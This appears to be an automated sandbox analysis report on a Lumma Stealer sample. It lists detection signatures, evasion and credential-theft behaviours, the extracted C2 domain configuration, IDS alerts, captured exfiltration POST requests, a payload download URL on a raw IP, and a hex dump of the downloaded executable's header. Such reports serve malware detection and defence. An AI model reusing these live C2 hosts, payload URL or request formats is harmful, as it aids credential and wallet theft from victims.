Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1543498
MD5:	d982361460f61047f7eeff2e03e61d91
SHA1:	6d37f680a2280e48f82ef28ad5af9df24af6cb36
SHA256:	8841385bb1affb88e7a23ea5569e36e0ed09627cd79ec6218b70cbedab3a9c64
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Potentially malicious time measurement code found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D982361460F61047F7EEFF2E03E61D91)

4LSU4O6YQKPDF8R94WQ6K0Z23.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe" MD5: 1D792472559DBD0C610878880006F977)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["navygenerayk.store", "scriptyprefej.store", "thumbystriw.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "necklacedmny.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2120373354.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6180	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 6180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6180	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:05.754683+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	172.67.170.64	443	TCP
2024-10-28T02:07:09.140172+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.170.64	443	TCP
2024-10-28T02:07:21.691294+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49716	172.67.170.64	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:05.754683+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	172.67.170.64	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:09.140172+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	172.67.170.64	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:22.604846+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49724	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:15.392619+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.67.170.64	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T02:07:16.524523+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49710	172.67.170.64	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.6180.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["navygenerayk.store", "scriptyprefej.store", "thumbystriw.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "necklacedmny.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scriptyprefej.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: navygenerayk.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: founpiuer.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacedmny.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: thumbystriw.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fadehairucw.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crisiwarny.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49716 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe, 00000003.00000002.2457662050.0000000000A62000.00000040.00000001.01000000.00000006.sdmp, 4LSU4O6YQKPDF8R94WQ6K0Z23.exe, 00000003.00000003.2323929512.0000000005330000.00000004.00001000.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 172.67.170.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 172.67.170.64:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: crisiwarny.store

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 28 Oct 2024 01:07:22 GMTContent-Type: application/octet-streamContent-Length: 2783232Last-Modified: Sun, 27 Oct 2024 23:53:51 GMTConnection: keep-aliveETag: "671ed28f-2a7800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 43 c7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 61 70 65 62 68 70 63 00 20 2a 00 00 a0 00 00 00 18 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 61 62 6e 66 70 62 6f 00 20 00 00 00 c0 2a 00 00 04 00 00 00 52 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 172.67.170.64 172.67.170.64
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49724 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551275Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic

HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store

Source: file.exe, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303555937.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/D
Source: file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/a
Source: file.exe, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303555937.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303172541.00000000008FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2303859977.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301508761.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exek
Source: file.exe, 00000000.00000002.2303859977.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301508761.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeki
Source: file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/x
Source: file.exe, 00000000.00000002.2303555937.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exerosoft
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
